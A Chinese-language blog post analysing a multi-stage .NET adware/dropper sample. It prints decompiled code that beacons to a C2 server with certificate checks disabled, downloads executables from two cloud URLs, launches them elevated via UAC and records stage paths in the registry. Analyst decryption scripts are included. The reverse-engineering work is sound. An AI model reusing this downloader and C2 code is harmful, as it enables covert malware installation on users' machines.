最近好忙,把之前做的一个分析发出来吧。是一个朋友给我发的。在这个样本里也学到不少东西。

Publisher sample

沙盒报告

Hybrid沙盒报告

https://hybrid-analysis.com/sample/0869692793e8940ae58615f19957da715c053e7f3e1d5f2aa7d64ea2a9bb077b/62f61284b774d475fc58f872

vt报告

https://www.virustotal.com/gui/file/0869692793e8940ae58615f19957da715c053e7f3e1d5f2aa7d64ea2a9bb077b/relations


网络行为

  • 访问google.com探测网络情况。

  • 访问hxxps://connectini.net/series/conumer4publisher.php广告页面

![image-20220812165146168](/Users/scr1pt/Library/Application Support/typora-user-images/image-20220812165146168.png)

修改内核

image-20220812165737620

在 nsi.dll(NSI User-mode interface DLL)中检测到 hook

image-20220812165804875

从程序中提取出该dll

image-20220812170155451

静态分析

定时启动edge并访问网站

image-20220812162607011

反混淆

通过de4dot检测出为.NET Reactor混淆。

C:\Users\Scr1pt\Desktop\de4dot-master\Release\net45>de4dot.exe Wycuwaeqaetae.exe -d

de4dot v3.1.41592.3405

Detected .NET Reactor (C:\Users\Scr1pt\Desktop\de4dot-master\Release\net45\Wycuwaeqaetae.exe)

脱壳完成后如下

image-20221222132946480

代码分析

main函数

// Publisher entry point (decompiled). Every call goes to a sibling class that is not shown
// on this page, so the per-step purpose below is inferred from the call shape and the
// analysis text rather than from visible code.
// NOTE(review): smethod_19 receives this assembly's own on-disk path — presumably
// self-location / persistence setup; confirm in Class1.
private static void Main(string[] args)
{
Class1.smethod_19(Assembly.GetExecutingAssembly().Location);
Class1.smethod_5(Class7.smethod_0());
Class4.smethod_0();
Class4.smethod_2();
// The raw command line is forwarded unchanged; the smethod_3 shown later on this page
// compares the joined, lower-cased args against "/static", "/didane" and "/noat" to pick
// one of the embedded encrypted configs.
Class2.smethod_1(args);
}
  • 调用Class2.smethod_1并传入参数args

class2中核心代码功能

// Enumerates the browsers registered under HKLM\...\Clients\StartMenuInternet and returns the
// executable path recorded in each entry's DefaultIcon value. Presumably this is how the
// sample chooses a browser for the ad page (the analysis notes it launches Edge) — confirm.
// Class1.smethod_4() is not shown; the WOW6432Node branch suggests it reports whether the
// process runs as 32-bit on a 64-bit OS — TODO confirm in Class1.
public static List<string> smethod_2()
{
RegistryKey registryKey;
if (Class1.smethod_4())
{
registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\WOW6432Node\\Clients\\StartMenuInternet");
}
else
{
registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Clients\\StartMenuInternet");
}
List<string> list = new List<string>();
// OpenSubKey returns null when the key is absent; nothing guards it here, so on a host
// without this key the sample dies with a NullReferenceException at GetSubKeyNames().
foreach (string str in registryKey.GetSubKeyNames())
{
RegistryKey registryKey2 = registryKey.OpenSubKey(str + "\\DefaultIcon");
if (registryKey2 != null)
{
// The (Default) value of DefaultIcon, typically "<path>\browser.exe,0".
object value = registryKey2.GetValue(null);
if (value != null)
{
// `as string` yields null for a non-string value kind, which then throws on
// Contains(); the sample does not handle that case.
string text = value as string;
// string.Contains(string) is ordinal and case-sensitive: an ".EXE" entry is skipped.
if (text.Contains(".exe"))
{
// Strip the ",<icon index>" suffix by cutting right after the last ".exe".
int num = text.LastIndexOf(".exe");
if (num >= 0)
{
text = text.Substring(0, num + 4);
}
list.Add(text);
}
}
}
}
// Neither registry key handle is closed explicitly; they are released by the finalizer.
return list;
}

找到菜单里的浏览器如

image-20220815105118675

找到操作系统默认浏览器

```



![image-20220815105624929](/Users/scr1pt/Library/Application Support/typora-user-images/image-20220815105624929.png)



-

![image-20220815104407263](https://scr1pt-1302658871.cos.ap-chengdu.myqcloud.com/img/image-20220815104407263.png)

解密信息

```c#
// Selects and decrypts the embedded campaign configuration and stores its fields in Class1.
// string_0: the process command line. Joined and lower-cased, "/static", "/didane" and
// "/noat" each select a different Base64 blob; anything else falls back to Class3.smethod_0().
// Class3.smethod_1 is not shown. The analyst's script further down (Rijndael, 256-bit block,
// CBC, zero padding, fixed key/IV) reproduces its output, and the decrypted samples there are
// six '_'-separated fields — so smethod_1 presumably decrypts and splits on '_'. TODO confirm.
private static void smethod_3(string[] string_0)
{
string[] array;
// ToLower() is culture-sensitive; under e.g. a Turkish locale "/STATIC" would not match.
if (string.Join("", string_0).ToLower().Equals("/static"))
{
array = Class3.smethod_1("MfH/416BjL3duVScX5KRh+n3oH+zTD2HchoneRO79NT78OB4DF7SPDLH2HP7tCOzC9uHnKFXRLOeH/W0tKJ9SQ==");
}
else if (string.Join("", string_0).ToLower().Equals("/didane"))
{
array = Class3.smethod_1("dk0zM/j9YXI/r3xvxYqCkOVUzmdKicdnCO6HZa65jHQZ7c1c6GjaeyWt3WU3HGBCrc06Do2MNvANBpwRBGI21A==");
}
else if (string.Join("", string_0).ToLower().Equals("/noat"))
{
array = Class3.smethod_1("0TaZdn4GCR7imkFl+dvHP+rvvoZiV4u3LWOO00sqcdDOPUZ3NsBt9Gvi3res469eUgoV22XsJ5K9mly4ZPfEyA==");
}
else
{
array = Class3.smethod_0();
}
// Field layout, inferred only from the indices used here: [0] and [1] go through
// smethod_9 / smethod_17, [3] and [4] are kept as opaque objects, [5] goes through
// smethod_13; [2] is not used in this method. Fewer than six fields would throw
// IndexOutOfRangeException, which nothing in this method catches.
Class1.string_2 = "1";
Class1.smethod_17(array[1]);
Class1.smethod_9(array[0]);
Class1.object_1 = array[3];
Class1.object_0 = array[4];
Class1.smethod_13(array[5]);
// Builds the campaign tag "_<f0>_<f1>_<f3>_<f4>" that later identifies this install
// (presumably the value posted to the C2 by Class9.smethod_1 — confirm in Class1.smethod_16).
Class1.smethod_15(string.Concat(new string[]
{
"_",
array[0],
"_",
array[1],
"_",
array[3],
"_",
Class1.object_0
}));
}

编写脚本进行解密

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

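namespace Application
{
    /// <summary>
    /// Analyst tool: decrypts one Base64 blob embedded in the publisher sample with the
    /// parameters recovered from it (Rijndael, 256-bit key and 256-bit block, CBC, zero
    /// padding, fixed key and IV) and prints the plaintext.
    /// </summary>
    class Program
    {
        // Key and IV exactly as recovered from the sample (Base64-encoded).
        private const string KeyBase64 = "qFHOogTyxI+U+0mWctzFngMWGgWUj5BB8bT2UlmnG5k=";
        private const string IvBase64 = "v9WVEt44bKrmHGpayCh40DodYqxlcDTF9lGIduUh0Zw=";

        static void Main(string[] args)
        {
            // Paste the ciphertext taken from the sample in place of "base64".
            string string_0 = "base64";
            Console.Write(Decrypt(string_0));
        }

        /// <summary>
        /// Decrypts a Base64 ciphertext and renders every plaintext byte as one char.
        /// </summary>
        /// <param name="base64">Ciphertext as Base64.</param>
        /// <returns>The plaintext, one char per byte. Zero-padding bytes are kept, exactly as
        /// the sample's own decryptor sees them.</returns>
        /// <exception cref="FormatException"><paramref name="base64"/> is not valid Base64.</exception>
        /// <exception cref="CryptographicException">The ciphertext length is not a multiple of the 32-byte block.</exception>
        /// <exception cref="PlatformNotSupportedException">BlockSize = 256 is only available from
        /// RijndaelManaged on .NET Framework; .NET Core / .NET 5+ implement AES (128-bit block) only.</exception>
        static string Decrypt(string base64)
        {
            byte[] rgbKey = Convert.FromBase64String(KeyBase64);
            byte[] rgbIV = Convert.FromBase64String(IvBase64);
            byte[] cipher = Convert.FromBase64String(base64);
            using (RijndaelManaged rijndael = new RijndaelManaged())
            {
                rijndael.Padding = PaddingMode.Zeros;
                rijndael.Mode = CipherMode.CBC;
                rijndael.KeySize = 256;
                rijndael.BlockSize = 256;
                using (ICryptoTransform transform = rijndael.CreateDecryptor(rgbKey, rgbIV))
                using (CryptoStream cryptoStream = new CryptoStream(new MemoryStream(cipher), transform, CryptoStreamMode.Read))
                using (MemoryStream plain = new MemoryStream())
                {
                    // Drain the whole stream: a single Read() call is not guaranteed to return
                    // every byte, and the streams are now disposed on every path.
                    cryptoStream.CopyTo(plain);
                    byte[] bytes = plain.ToArray();
                    StringBuilder text = new StringBuilder(bytes.Length);
                    foreach (byte b in bytes)
                    {
                        // Same byte-to-char mapping as the original loop (no text encoding applied).
                        text.Append(Convert.ToChar(b));
                    }
                    return text.ToString();
                }
            }
        }
    }
}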
# lylal_chlyal_2_irecord_goodchannel_TN
# partner2_channel2_1_ProZipper_saleschannel1_TN
# publisher1_channel1_3_systemtools_normale_TN

解密了字符串后,调用网络函数

// Call site of the C2 configuration fetch shown below; PBM receives the deserialized response.
Config_CPM_To_Work_ID__njnghyznt58gkup7hpx5 PBM = Class9.smethod_1();
// Fetches this install's remote configuration from the C2 and returns it deserialized
// (Newtonsoft JsonConvert). Detection notes: a POST of one form field "jiglibaf" to
// connectini.net, no User-Agent set, caching disabled; the TLS callback installed below makes
// the sample accept any server certificate, so it keeps working behind an intercepting proxy.
public static Config_CPM_To_Work_ID__njnghyznt58gkup7hpx5 smethod_1()
{
// Process-wide: every later HTTPS request in this process skips certificate validation.
ServicePointManager.ServerCertificateValidationCallback = ((object <p0>, X509Certificate <p1>, X509Chain <p2>, SslPolicyErrors <p3>) => true);
HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create("https://connectini.net/Series/Conumer4Publisher.php");
httpWebRequest.Method = "POST";
httpWebRequest.ContentType = "application/x-www-form-urlencoded";
// Class5.smethod_1 / Class1.smethod_16 are not shown. Given the registry code elsewhere on
// this page, smethod_1 is presumably the string encryptor and smethod_16 the campaign tag
// built in smethod_3 — TODO confirm. The value is not URL-encoded, so any '+' or '=' in it
// reaches the server unescaped.
string s = "jiglibaf=" + Class5.smethod_1(Class1.smethod_16());
HttpRequestCachePolicy cachePolicy = new HttpRequestCachePolicy(HttpRequestCacheLevel.NoCacheNoStore);
httpWebRequest.CachePolicy = cachePolicy;
byte[] bytes = Encoding.UTF8.GetBytes(s);
httpWebRequest.ContentLength = (long)bytes.Length;
// The request stream is never disposed, and a WebException from GetResponse() propagates
// to the caller with the response streams below left open.
httpWebRequest.GetRequestStream().Write(bytes, 0, bytes.Length);
Stream responseStream = httpWebRequest.GetResponse().GetResponseStream();
StreamReader streamReader = new StreamReader(responseStream);
string text = string.Empty;
text = streamReader.ReadToEnd();
responseStream.Dispose();
streamReader.Dispose();
// Response post-processing: drop every literal "false" (even inside values), decode with
// Class5.smethod_0 (presumably the matching decryptor — confirm), then strip everything
// outside tab / LF / CR / printable ASCII before parsing as JSON. The extra '^' characters
// inside the class are literal and redundant, since 0x5E already lies in 0x20-0x7E.
text = Regex.Replace(text, "false", "");
text = Class5.smethod_0(text);
text = Regex.Replace(text, "[^\\u0009^\\u000A^\\u000D^\\u0020-\\u007E]", "");
return JsonConvert.DeserializeObject<Config_CPM_To_Work_ID__njnghyznt58gkup7hpx5>(text);
}

访问如下ip和域名

image-20220815144008940

重要的注册表项,从中可以分析出该病毒共由四个部分组成

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery

image-20220815150950882

动态分析

DpEditor程序在运行后会自动提权

image-20220815113714919

设置策略ASLR

image-20220815103620364

信息搜集

读取剪贴板

image-20220815103758599

handler sample

starter样本为C:\Program Files (x86)\DB Browser for SQLite\Fabyshamyne.exe

handler 样本会调用 Windows__Update.exe,即后文的 setter 样本

main

// Class4
// Token: 0x0600000C RID: 12 RVA: 0x00002874 File Offset: 0x00000A74
// Handler entry point: registers itself as "starter", downloads the "setter" stage to
// Windows__Update.exe next to itself, writes the setter's .config and launches it elevated.
// The empty catch swallows every exception, so a failed download or a declined UAC prompt
// leaves no trace at all.
[STAThread]
private static void Main()
{
try
{
// Two encrypted download URLs (AES-256-CBC, key = SHA-256("b36LzRXR9X6Z"), fixed IV —
// see the analyst's handler_decrypt further down). The second is the fallback for the first.
string string_ = "LK2zlxjoHgSvPDPzD/qbov81CGp3Bi70VrPYVKti99GC/u1I1h5UUXgPadFJq3Y7TASY0TYW93yZdrHvTUoCai5Ui2oS9f2dz8QRzaQiAXg=";
string string_2 = "FxA/rmRZZ6Y4L9w5VHSRiBcH8zbKDGf/aidAUz74ZE422DhHo95R/gCXtBy7gwKqKy5Hf/Wt8RK2fLMOEq5Natt1mf3GX1zVWHH1G4KsglU=";
// These two WriteLine calls print the decrypted URLs to a console the sample does not
// normally have — leftover debug code, or inserted during analysis; TODO confirm against the binary.
Console.WriteLine(Class3.smethod_1(string_));
Console.WriteLine(Class3.smethod_1(string_2));
// Blocks until google.com answers an ICMP echo (Class4.smethod_0 / smethod_1 below).
Class4.smethod_0();
string directoryName = Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location);
// Class5.smethod_0(name, path): returns the path stored (encrypted) under
// HKCU\Software\Microsoft\Windows\CurrentVersion\Recovery\<name> if that file exists,
// otherwise records `path` there and returns it (shown later on this page).
Class5.smethod_0("starter", Assembly.GetExecutingAssembly().Location);
string text = Path.Combine(directoryName, "Windows__Update.exe");
text = Class5.smethod_0("setter", text);
// Class2.smethod_0(url, path) downloads with WebClient and returns success; on failure
// the fallback URL is tried once and its result is ignored.
if (!Class2.smethod_0(Class3.smethod_1(string_), text))
{
Class2.smethod_0(Class3.smethod_1(string_2), text);
}
// Writes "<setter>.config" (legacy CAS policy + useUnsafeHeaderParsing) beside the payload.
Class1.smethod_0(text + ".config");
// Starts the setter with UseShellExecute = true and Verb = "runas" (UAC elevation prompt).
Class2.smethod_1(text, null);
}
catch (Exception)
{
}
}

编写解密函数

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

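namespace Application
{
    /// <summary>
    /// Analyst helpers that reproduce the two string-decryption routines found in the samples:
    /// <see cref="decrypt"/> for the publisher sample (Rijndael-256, CBC, zero padding, fixed
    /// key/IV) and <see cref="handler_decrypt"/> for the handler sample (AES-256-CBC, key derived
    /// from SHA-256 of a hard-coded passphrase, fixed IV). Keys, IVs and ciphertexts are exactly
    /// as recovered from the binaries.
    /// </summary>
    class Program
    {
        /// <summary>
        /// Decrypts one publisher-sample blob and prints the plaintext, one char per byte,
        /// followed by a newline. Zero-padding bytes are printed as in the sample.
        /// </summary>
        /// <param name="enc">Base64 ciphertext. Spaces are treated as '+' characters that were
        /// mangled during copy/paste.</param>
        /// <remarks>BlockSize = 256 is only available from RijndaelManaged on .NET Framework;
        /// on .NET Core / .NET 5+ this throws PlatformNotSupportedException.</remarks>
        static void decrypt(string enc)
        {
            // Strings are immutable: Replace returns a new string. The original discarded it,
            // so a pasted blob containing spaces failed to decode.
            enc = enc.Replace(" ", "+");

            byte[] rgbKey = Convert.FromBase64String("qFHOogTyxI+U+0mWctzFngMWGgWUj5BB8bT2UlmnG5k=");
            byte[] rgbIV = Convert.FromBase64String("v9WVEt44bKrmHGpayCh40DodYqxlcDTF9lGIduUh0Zw=");
            byte[] cipher = Convert.FromBase64String(enc);
            using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
            {
                rijndaelManaged.Padding = PaddingMode.Zeros;
                rijndaelManaged.Mode = CipherMode.CBC;
                rijndaelManaged.KeySize = 256;
                rijndaelManaged.BlockSize = 256;
                using (ICryptoTransform transform = rijndaelManaged.CreateDecryptor(rgbKey, rgbIV))
                using (CryptoStream cryptoStream = new CryptoStream(new MemoryStream(cipher), transform, CryptoStreamMode.Read))
                using (MemoryStream plain = new MemoryStream())
                {
                    // Drain the whole stream; a single Read() call need not return every byte.
                    cryptoStream.CopyTo(plain);
                    foreach (byte b in plain.ToArray())
                    {
                        // Same byte-to-char mapping as the original loop (no text encoding applied).
                        Console.Write(Convert.ToChar(b));
                    }
                }
            }
            Console.WriteLine();
        }

        /// <summary>
        /// Decrypts one handler-sample string: AES-256-CBC with PKCS7 padding (the Aes default),
        /// key = SHA-256("b36LzRXR9X6Z"), fixed 16-byte IV.
        /// </summary>
        /// <param name="string_0">Base64 ciphertext.</param>
        /// <returns>The plaintext decoded as ASCII (bytes above 0x7F become '?').</returns>
        /// <exception cref="FormatException"><paramref name="string_0"/> is not valid Base64.</exception>
        /// <exception cref="CryptographicException">Wrong key/IV or corrupted data (bad padding).</exception>
        static string handler_decrypt(string string_0)
        {
            // IV exactly as stored in the sample.
            byte[] iv = { 1, 3, 0, 7, 6, 4, 4, 6, 5, 1, 2, 4, 3, 2, 0, 5 };
            byte[] key = new byte[32];
            using (SHA256 sha256 = SHA256.Create())
            {
                // SHA-256 yields exactly 32 bytes, so the copy takes the whole digest.
                byte[] digest = sha256.ComputeHash(Encoding.ASCII.GetBytes("b36LzRXR9X6Z"));
                Array.Copy(digest, 0, key, 0, 32);
            }
            byte[] cipher = Convert.FromBase64String(string_0);
            using (Aes aes = Aes.Create())
            {
                aes.Mode = CipherMode.CBC;
                aes.Key = key;
                aes.IV = iv;
                using (ICryptoTransform transform = aes.CreateDecryptor())
                using (MemoryStream memoryStream = new MemoryStream())
                using (CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Write))
                {
                    cryptoStream.Write(cipher, 0, cipher.Length);
                    // FlushFinalBlock writes the last block and verifies the padding.
                    cryptoStream.FlushFinalBlock();
                    byte[] plain = memoryStream.ToArray();
                    return Encoding.ASCII.GetString(plain, 0, plain.Length);
                }
            }
        }

        static void Main(string[] args)
        {
            // Publisher-sample blobs (cors / reporters / setter / starter), decrypted in an
            // earlier run with decrypt(); kept here for reference.
            /* string string_0 = "MlvMhaZlrG9HII6YGgWP7fLHhxJFm7CsGEGYUPnVxaqbS8M0xulN/0dry88yk7Go/SYljnhYGmowpBM53eqhwULf7e6ejmujjiJ/PlSAMKKJemvpV5qPR+OFC2ocC4V2";
            string string_1 = "MlvMhaZlrG9HII6YGgWP7fLHhxJFm7CsGEGYUPnVxapINYR+4YYSQXcK9aGKmGa19Tjeb054JIvz272ECLlxz8qq8ZkO5Xvo5ppqN3a/C7Kqr+ysYsk7AZJz8eVtEGLq";
            string string_2 = "Xz7eEYZ56pbTApLdtuwVh/vYezWw9MsOm0DHpIfHljMLotvx58kngmMzek0V31v9gEQKx9TAi7EZRl/nRx2kxU24PS9x8J9Plugw7higuJWDa7HRkZLrFM4e8QqST9Pn";
            string string_3 = "Xz7eEYZ56pbTApLdtuwVh/vYezWw9MsOm0DHpIfHljOACnaBf8S8JxP0eqMek5Tg9uh3iycT/umPhbpKqGQsHQ==";
            Console.WriteLine("cors");
            decrypt(string_0);
            Console.WriteLine("reporters");
            decrypt(string_1);
            Console.WriteLine("setter");
            decrypt(string_2);
            Console.WriteLine("starter");
            decrypt(string_3);
            */

            // The two encrypted download URLs from the handler sample's Main.
            string handler_enc_1 = "LK2zlxjoHgSvPDPzD/qbov81CGp3Bi70VrPYVKti99GC/u1I1h5UUXgPadFJq3Y7TASY0TYW93yZdrHvTUoCai5Ui2oS9f2dz8QRzaQiAXg=";
            string handler_enc_2 = "FxA/rmRZZ6Y4L9w5VHSRiBcH8zbKDGf/aidAUz74ZE422DhHo95R/gCXtBy7gwKqKy5Hf/Wt8RK2fLMOEq5Natt1mf3GX1zVWHH1G4KsglU=";

            string out_1 = handler_decrypt(handler_enc_1);
            Console.WriteLine(out_1);
            string out_2 = handler_decrypt(handler_enc_2);
            Console.WriteLine(out_2);
        }
    }
}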

image-20220815153825587

涉及到两个域名, 两个都挂了

https://uchiha.s3.pl-waw.scw.cloud/madara/rec-ggqbmb8yyq32mkm8.exe
https://senju.s3.pl-waw.scw.cloud/tobirama/rec-46s6vg7zcjfe8ug4.exe

然后 Class4.smethod_0 函数每隔一秒 ping 一次 google.com,直到网络可达为止

// Polls smethod_1 once a second until google.com answers an ICMP echo.
// There is no upper bound: in an isolated sandbox with no outbound ICMP the handler never
// returns from this call, which explains a short detonation showing no further activity.
private static void smethod_0()
{
while (!Class4.smethod_1())
{
Thread.Sleep(1000);
}
}

// Token: 0x0600000E RID: 14 RVA: 0x0000292C File Offset: 0x00000B2C
// Connectivity probe: one ICMP echo to google.com with a 1 s timeout and a 32-byte all-zero
// payload (ping.exe sends a text pattern by default, so the zero payload is a possible
// network signature). Any exception — DNS failure, ICMP blocked, ... — yields false.
// The Ping instance is never disposed.
private static bool smethod_1()
{
bool result;
try
{
Ping ping = new Ping();
string hostNameOrAddress = "google.com";
byte[] buffer = new byte[32];
PingOptions options = new PingOptions();
result = (ping.Send(hostNameOrAddress, 1000, buffer, options).Status == IPStatus.Success);
}
catch (Exception)
{
result = false;
}
return result;
}

然后去注册表里查找 starter 键,解密后得到 starter 的路径,也就是 C:\Program Files (x86)\DB Browser for SQLite\Fabyshamyne.exe;接着以同样的方式查找 setter,也就是 C:\Program Files (x86)\DB Browser for SQLite\Windows__Update.exe

// Resolves — or registers — the on-disk location of one stage under
// HKCU\Software\Microsoft\Windows\CurrentVersion\Recovery.
// string_2: value name ("starter", "setter", ...); string_3: the path to use when nothing usable is stored.
// Returns the stored path if it decrypts to an existing file; otherwise writes
// Class5.smethod_1(string_3) (presumably the encrypted path — inferred from the smethod_2 call
// below) under that value name and returns string_3. Any exception also returns string_3, so
// the caller cannot distinguish a registry failure from a fresh install.
// Hunting note: this Recovery key, with values named after the stages, is the location record
// for every stage of the family (the analysis counts four).
internal static string smethod_0(string string_2, string string_3)
{
string result;
try
{
// Opened writable even though this branch only reads.
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Recovery", true);
if (registryKey != null)
{
// Direct cast: a non-REG_SZ value throws InvalidCastException, caught below.
string text = (string)registryKey.GetValue(string_2);
if (!string.IsNullOrEmpty(text))
{
// Class5.smethod_2: the inverse of smethod_1 (decrypt) — not shown, inferred from usage.
text = Class5.smethod_2(text);
registryKey.Close();
if (File.Exists(text))
{
return text;
}
}
}
// Missing key, missing value, or stale path: (re)create the key and record the new path.
// The handle returned by CreateSubKey is never closed.
registryKey = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Recovery");
registryKey.SetValue(string_2, Class5.smethod_1(string_3));
result = string_3;
}
catch (Exception)
{
result = string_3;
}
return result;
}

得到路径后,会发起网络行为去访问之前得到的两个域名。

internal static bool smethod_0(string string_0, string string_1)
{
ServicePointManager.ServerCertificateValidationCallback = ((object <p0>, X509Certificate <p1>, X509Chain <p2>, SslPolicyErrors <p3>) => true);
bool result;
try
{
ServicePointManager.SecurityProtocol = (SecurityProtocolType)4032;
using (WebClient webClient = new WebClient())
{
webClient.Headers.Add("Content-Type", "application/octet-stream");
webClient.Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36;");
webClient.DownloadFile(string_0, string_1);
}
result = true;
...

再为 setter 写入 .config 文件

The runtime uses legacy CAS policy.

// Writes the app.config the setter stage is launched with (string_0 = "<setter>.config").
// Settings worth noting for triage:
//  - useLegacyV2RuntimeActivationPolicy plus the long supportedRuntime list: the payload runs
//    on whichever CLR is installed, v2.0 through v4.7.1;
//  - NetFx40_LegacySecurityPolicy: re-enables legacy CAS policy (the "runtime uses legacy CAS
//    policy" note above);
//  - httpWebRequest useUnsafeHeaderParsing: accepts malformed HTTP response headers from the C2.
// A ".config" carrying exactly these switches next to an unexpected exe in the
// "DB Browser for SQLite" folder is a usable hunting artifact. Any existing file is overwritten
// without a check, and IO exceptions propagate to the caller (the handler's Main swallows them).
internal static void smethod_0(string string_0)
{
string contents = string.Join(Environment.NewLine, new string[]
{
"<?xml version=\"1.0\" encoding=\"utf-8\" ?>",
"<configuration>",
" <startup useLegacyV2RuntimeActivationPolicy=\"true\">",
" <supportedRuntime version=\"v2.0.50727\"/>",
" <!-- ",
" <supportedRuntime version=\"v3.5\"/> \"The .NET Framework version 3.0 and 3.5 use version 2.0.50727 of the CLR.\"",
" -->",
" <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.0,Profile=Client\" />",
" <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.0\" />",
" <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.0.1,Profile=Client\" />",
" <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.0.1\" />",
" <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.0.2,Profile=Client\" />",
" <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.0.2\" />",
" <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.0.3,Profile=Client\" />",
" <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.0.3\" />",
" <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.5\" />",
" <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.5.1\" />",
" <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.5.2\" />",
" <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.6\" />",
" <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.6.1\" />",
" <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.6.2\" />",
" <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.7\" />",
" <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.7.1\" />",
" </startup>",
" <runtime>",
" <NetFx40_LegacySecurityPolicy enabled=\"true\"/>",
" </runtime>",
" <system.net>",
" <settings>",
" <httpWebRequest useUnsafeHeaderParsing = \"true\" />",
" </settings>",
" </system.net>",
"</configuration>"
});
File.WriteAllText(string_0, contents);
}

设置 ProcessStartInfo 并启动进程 Windows__Update.exe(setter)

UseShellExecute = true

Verb = “runas”

  • 表示通过 ShellExecute 以管理员权限(弹出 UAC)启动进程;Verb 只在 UseShellExecute = true 时生效,若为 false 则会被忽略
internal static bool smethod_1(string string_0, string string_1)
{
ProcessStartInfo processStartInfo;
if (string.IsNullOrEmpty(string_1))
{
processStartInfo = new ProcessStartInfo(string_0);
}
else
{
processStartInfo = new ProcessStartInfo(string_0, string_1);
}
processStartInfo.UseShellExecute = true;
processStartInfo.Verb = "runas";
bool result;
try
{
if (Process.Start(processStartInfo) == null)
{
result = false;
}
else
...

starter sample

C:\Program Files (x86)\DB Browser for SQLite\Fabyshamyne.exe

setter sample

C:\Program Files (x86)\DB Browser for SQLite\Windows__Update.exe

main

// Class12
// Token: 0x06000059 RID: 89 RVA: 0x00003CEC File Offset: 0x00001EEC
// Setter entry point: a dormant check-in loop. Reads the campaign fields from the registry,
// then once an hour asks the C2 whether to proceed, and only then sends the "CheckTime" track
// event. Both catch blocks are empty, so any failure ends the process silently.
// Sandbox note: with a one-hour sleep per iteration and the gate keyed to the binary's creation
// time, a short detonation observes at most one POST.
[STAThread]
private static void Main(string[] args)
{
try
{
Class12.smethod_0();
Class13.smethod_0(); // sets useUnsafeHeaderParsing via reflection (author's note)
// Install age is measured from the exe's creation timestamp (and is therefore under the
// control of whoever copies the file — relevant when trying to trigger the gate in a lab).
DateTime creationTime = File.GetCreationTime(Assembly.GetEntryAssembly().Location);
try
{
string[] array = Class5.smethod_0(); // reads HKEY_CURRENT_USER\SOFTWARE\Microsoft\Etsy (author's note)
if (array == null || array.Length < 1)
{
throw new Exception("key mech mrigel raw");
}
// Fields stored into Class7: [0], [5], [2], [1], [4]; [3] is unused here. The check above
// only guarantees one element, so a short array throws IndexOutOfRangeException — caught below.
Class7.smethod_7(array[0]);
Class7.smethod_5(array[5]);
Class7.smethod_3(array[2]);
Class7.smethod_1(array[1]);
Class7.object_0 = array[4];
// Tracking object named "Recover<..>_<..>_<..>"; Class7.smethod_2/6/0 presumably return the
// fields set just above — which field each one returns is not visible here.
Track_tLBUlXiz3LTPMOpd track_tLBUlXiz3LTPMOpd = new Track_tLBUlXiz3LTPMOpd(string.Concat(new string[]
{
"Recover",
Class7.smethod_2(),
"_",
Class7.smethod_6(),
"_",
Class7.smethod_0()
}), "0", Class7.smethod_4());
Class11.smethod_2();
bool flag;
do
{
flag = false;
// Class9.smethod_0 POSTs to connectini.net/Series/za3ma_za3ma.php (see below) with the
// install age in days and campaign fields; the reply is expected to be "true" or "false".
string value = Class9.smethod_0(creationTime, (int)(DateTime.Now - creationTime).TotalDays, Class7.smethod_4(), Class7.smethod_6(), Class7.smethod_0());
if (!string.IsNullOrEmpty(value))
{
// Convert.ToBoolean(string) accepts only "true"/"false" (case-insensitive, trimmed);
// anything else throws FormatException, which the catch below swallows — ending the loop.
flag = Convert.ToBoolean(value);
}
Class6.smethod_0(flag, (int)(DateTime.Now - creationTime).TotalDays);
// Sleeps a full hour even after a positive answer before leaving the loop.
Thread.Sleep((int)TimeSpan.FromHours(1.0).TotalMilliseconds);
}
while (!flag);
track_tLBUlXiz3LTPMOpd.sendtrack("CheckTime", "succed");
}
catch (Exception)
{
}
}
catch (Exception)
{
}
}

获取key值并返回到array

ZiUe+wge1VAJ72v/pDJqhJiZEXHqRrfqwloqvO+GJXjcTH+kshpDQsoK+Q50NF4foeTa5fED4oRGjzZ3HaCX4Q==

image-20220815161524430

主代码逻辑到

// Excerpt of the check-in loop from Class12.Main above: poll the C2 once an hour until it
// answers "true". `creationTime` is the exe's creation timestamp captured before the loop.
bool flag;
do
{
flag = false;
// Class9.smethod_0: POST to connectini.net/Series/za3ma_za3ma.php with the install age in days.
string value = Class9.smethod_0(creationTime, (int)(DateTime.Now - creationTime).TotalDays, Class7.smethod_4(), Class7.smethod_6(), Class7.smethod_0());
if (!string.IsNullOrEmpty(value))
{
// Convert.ToBoolean(string) throws FormatException for anything but "true"/"false".
flag = Convert.ToBoolean(value);
}
Class6.smethod_0(flag, (int)(DateTime.Now - creationTime).TotalDays);
Thread.Sleep((int)TimeSpan.FromHours(1.0).TotalMilliseconds);
}
while (!flag);

Class9.smethod_0 函数以 POST 方式访问 https://connectini.net/Series/za3ma_za3ma.php(分析时仍存活)

image-20220815165026117

POST 的参数名为 nchallahTe5dem=

本文采用CC-BY-SA-3.0协议,转载请注明出处
Author: scr1pt